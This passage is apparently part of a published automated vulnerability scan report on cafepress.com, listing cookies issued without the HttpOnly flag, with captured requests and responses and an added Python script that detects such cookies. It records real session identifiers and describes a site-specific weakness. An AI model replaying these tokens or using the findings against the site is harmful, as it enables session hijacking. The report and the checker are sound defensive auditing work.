__utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 60982
Date: Sun, 26 Dec 2010 13:47:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:04 GMT; path=/
Set-Cookie: cp_sc=100144; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:04 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 60982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
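The findings in this section (3.28 through 3.37) all come from the same test: read every Set-Cookie header in a response, report the ones issued without the HttpOnly attribute, and call out any whose name suggests a session identifier. The following is an added example, not part of the XSS.CX report or of Burp's own check, that performs that test in Python over a raw response. The sample response is constructed from the headers of finding 3.29 (/+posters) above, re-typed one header per line with the body omitted, plus one hypothetical cookie named hardened_example that does carry HttpOnly so the checker has a negative case. The session-name heuristic beyond ASP.NET_SessionId is an assumption added here.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample: the header block of finding 3.29 (/+posters) from this
# report, re-typed one header per line, plus a hypothetical "hardened_example"
# cookie that carries HttpOnly. The HTML body is omitted.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Server: Microsoft-IIS/7.0\r\n"
    "X-AspNet-Version: 2.0.50727\r\n"
    "Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:15 GMT; path=/\r\n"
    "Set-Cookie: cp_sc=100165; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:15 GMT; path=/\r\n"
    "Set-Cookie: cppss=3x0; domain=cafepress.com; path=/\r\n"
    "Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/\r\n"
    "Set-Cookie: hardened_example=1; domain=cafepress.com; path=/; HttpOnly\r\n"
    "Cache-Control: private\r\n"
    "Content-Length: 65598\r\n"
    "\r\n"
)

# Cookie names that usually carry a session identifier. ASP.NET_SessionId is
# the one this report flags; the generic pattern is an added heuristic.
SESSION_NAME_PATTERNS = (
    re.compile(r"^ASP\.NET_SessionId$", re.IGNORECASE),
    re.compile(r"sess(ion)?_?id|^(PHPSESSID|JSESSIONID)$", re.IGNORECASE),
)


@dataclass
class CookieFinding:
    name: str
    value: str
    attributes: Dict[str, str]   # e.g. {"domain": "cafepress.com", "path": "/"}
    httponly: bool
    secure: bool
    persistent: bool             # Expires or Max-Age present: outlives the browser session
    looks_like_session: bool


def parse_set_cookie(header_value: str) -> CookieFinding:
    """Parse one Set-Cookie value: name=value followed by ';'-separated attributes."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    name = name.strip()
    attributes: Dict[str, str] = {}
    flags = set()
    for part in parts[1:]:
        if not part:
            continue
        if "=" in part:
            key, _, val = part.partition("=")
            attributes[key.strip().lower()] = val.strip()
        else:
            flags.add(part.lower())   # valueless attributes such as HttpOnly and Secure
    return CookieFinding(
        name=name,
        value=value,
        attributes=attributes,
        httponly="httponly" in flags,
        secure="secure" in flags,
        persistent="expires" in attributes or "max-age" in attributes,
        looks_like_session=any(p.search(name) for p in SESSION_NAME_PATTERNS),
    )


def set_cookie_values(raw_response: str) -> List[str]:
    """Return the value of every Set-Cookie header in a raw HTTP response."""
    head = re.split(r"\r?\n\r?\n", raw_response, maxsplit=1)[0]
    values = []
    for line in head.splitlines():
        header, sep, value = line.partition(":")
        if sep and header.strip().lower() == "set-cookie":
            values.append(value.strip())
    return values


def cookies_missing_httponly(raw_response: str) -> List[CookieFinding]:
    """The check behind these findings: every cookie set without HttpOnly."""
    return [c for c in map(parse_set_cookie, set_cookie_values(raw_response)) if not c.httponly]


def session_tokens_at_risk(raw_response: str) -> List[str]:
    """Names of cookies that lack HttpOnly and look like session tokens; these are
    the ones a script injected through XSS could read via document.cookie."""
    return [c.name for c in cookies_missing_httponly(raw_response) if c.looks_like_session]


if __name__ == "__main__":
    for c in cookies_missing_httponly(SAMPLE_RESPONSE):
        tag = "SESSION TOKEN" if c.looks_like_session else "other"
        scope = c.attributes.get("domain", "<host only>") + c.attributes.get("path", "")
        print(f"{c.name:20s} missing HttpOnly  scope={scope}  persistent={c.persistent}  [{tag}]")
```

Run as a script it prints one line per unprotected cookie; the functions return the findings so the same check can sit in a pipeline. Two caveats the report's wording leaves out. First, HttpOnly only keeps the cookie out of document.cookie; a script already running in the page can still send authenticated requests with it, so the flag narrows what an XSS bug yields (no portable token) rather than neutralising it. Second, every cookie in these responses is scoped domain=cafepress.com, which makes it readable by a document on any cafepress.com subdomain that can be made to run script, not only on www. On ASP.NET the usual remediation is to have the framework add the flag to every cookie it issues (the httpOnlyCookies attribute of the httpCookies element in web.config, or HttpCookie.HttpOnly on individual cookies); that is general ASP.NET guidance, not something the report states.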
3.37. http://www.cafepress.com/+womens-tank-tops
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+womens-tank-tops
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100093; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:59 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+womens-tank-tops HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 59652
Date: Sun, 26 Dec 2010 13:44:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:59 GMT; path=/
Set-Cookie: cp_sc=100093; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:59 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3.38. http://www.cafepress.com/+womens-thongs
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+womens-thongs
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100115; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:00 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+womens-thongs HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW20
Cteonnt-Length: 61274
Date: Sun, 26 Dec 2010 13:47:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:00 GMT; path=/
Set-Cookie: cp_sc=100115; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:00 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 61274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3.39. http://www.cafepress.com/+yoga-mats
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+yoga-mats
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=201675; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:42 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+yoga-mats HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 59469
Date: Sun, 26 Dec 2010 13:48:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:42 GMT; path=/
Set-Cookie: cp_sc=201675; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:42 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59469

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3.40. http://www.cafepress.com/1/1/index1.html
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /1/1/index1.html
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
slx_session=3fd981e9a190058ee83a397fe8f24ad83ebc6679; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /1/1/index1.html HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Server: Apache
Content-Length: 142089
Content-Type: text/html; charset=utf-8
Date: Sun, 26 Dec 2010 13:48:59 GMT
Connection: close
Set-Cookie: slx_session=3fd981e9a190058ee83a397fe8f24ad83ebc6679; path=/
Cache-Control: no-cache, proxy-revalidate, max-age=10
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.o...[SNIP]...
3.41. http://www.cafepress.com/1/1/indexd1.html
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /1/1/indexd1.html
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
slx_session=4acaabeaecefdd8dff9a0090c3edc432b686b9f4; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /1/1/indexd1.html HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Server: Apache
Content-Length: 149438
Content-Type: text/html; charset=utf-8
Date: Sun, 26 Dec 2010 13:48:59 GMT
Connection: close
Set-Cookie: slx_session=4acaabeaecefdd8dff9a0090c3edc432b686b9f4; path=/
Cache-Control: no-cache, proxy-revalidate, max-age=10
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.o...[SNIP]...
3.42. http://www.cafepress.com/1/3/index1.html
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /1/3/index1.html
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
slx_session=400f6b47f695c657eb3c14bc7e3e4a27523d7ef2; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
